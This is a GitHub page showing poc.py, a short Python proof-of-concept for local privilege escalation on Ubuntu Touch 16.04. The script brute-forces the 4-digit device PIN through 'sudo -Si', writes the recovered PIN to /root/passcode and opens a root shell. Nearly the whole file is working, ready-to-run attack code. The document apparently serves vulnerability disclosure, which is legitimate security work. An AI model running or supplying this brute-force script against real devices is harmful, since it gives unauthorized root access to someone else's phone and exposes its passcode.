-
Notifications
You must be signed in to change notification settings - Fork 3
/
poc.py
33 lines (26 loc) · 859 Bytes
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
"""
Visit:
https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
Run as REGULAR user in Ubuntu Touch 16.04 with 4-digit passcode.
"""
import os
import sys
x = 1
while x <= 9999:
password = (str(x).zfill(4))
result = os.system("echo {} | sudo -Si".format(password.strip()))
if result == "0" or result == 0:
print("\n\n\n===> PIN is: " + password + "\n\n\n")
print("whoami result:")
os.system("echo \"whoami; echo " + password + " > /root/passcode; echo \"We saved passcode to the file /root/passcode:\"; cat /root/passcode\" | sudo su");
print()
os.system("sudo su");
exit(0)
x = x + 1
"""
What happened?
1. We found the 4-digit passcode via burtefore.
2. We obtained root.
3. We saved the content of 4-digit passcode in /root/passcode
4. We displayed the content of /root/passcode
"""